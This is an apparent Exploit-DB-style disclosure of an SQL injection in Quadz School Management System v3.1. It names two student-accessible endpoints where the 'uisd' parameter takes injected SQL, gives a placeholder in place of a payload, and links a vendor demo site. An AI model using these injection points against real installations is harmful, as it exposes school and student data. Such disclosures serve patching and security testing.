19 lines
No EOL
663 B
Text
19 lines
No EOL
663 B
Text
# # # # #
|
|
# Exploit Title: Quadz School Management System v3.1 - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 12.02.2017
|
|
# Vendor Homepage: http://awardcorporation.com/
|
|
# Software Buy: https://codecanyon.net/item/quadz-school-management-system/10452009
|
|
# Demo: http://mass.awardcorporation.com/
|
|
# Version: 3.1
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# Login as student user
|
|
# http://localhost/[PATH]/index.php/sclass/ownClassRoutin?uisd=[SQL]
|
|
# http://localhost/[PATH]/index.php/suggestion/own_suggestion?uisd=[SQL]
|
|
# # # # # |